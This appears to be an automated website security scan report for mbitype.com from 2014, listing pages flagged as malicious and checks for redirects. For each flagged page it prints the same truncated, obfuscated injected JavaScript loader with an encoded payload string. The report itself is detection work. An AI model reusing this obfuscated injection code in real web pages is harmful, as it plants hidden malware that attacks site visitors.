Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mbitype.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mbitype.com/ | 200 OK Content-Length: 15495 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b Antivirus reports:
| ||
http://mbitype.com/index.html | 200 OK Content-Length: 15495 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b Antivirus reports:
| ||
http://mbitype.com/services.html | 200 OK Content-Length: 15957 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b Antivirus reports:
| ||
http://mbitype.com/samples.html | 200 OK Content-Length: 14216 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b Antivirus reports:
| ||
http://mbitype.com/send.html | 200 OK Content-Length: 16729 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b Antivirus reports:
| ||
http://mbitype.com/contact.html | 200 OK Content-Length: 14800 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b Antivirus reports:
| ||
http://mbitype.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://mbitype.com/cgi-bin/upload.cgi?ac=admin | 500 Internal Server Error Content-Length: 667 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mbitype.simpsonstudio.com <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p> <p>Please contact the server administrator at webmaster@mbitype.simpsonstudio.com to inform them of the time this error occurred, and the actions you performed just before this error.</p> <p>More information about this error may be available in the server error log.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mbitype.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 21 Apr 2014 14:57:31 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 15495
Content-Type: text/html
Last-Modified: Tue, 08 Oct 2013 13:00:06 GMT
...15495 bytes of data.
GET / HTTP/1.1
Host: mbitype.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 21 Apr 2014 14:57:31 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 15495
Content-Type: text/html
Last-Modified: Tue, 08 Oct 2013 13:00:06 GMT
...15495 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mbitype.com
Referer: http://www.google.com/search?q=mbitype.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mbitype.com
Referer: http://www.google.com/search?q=mbitype.com
Result:
The result is similar to the first query. There are no suspicious redirects found.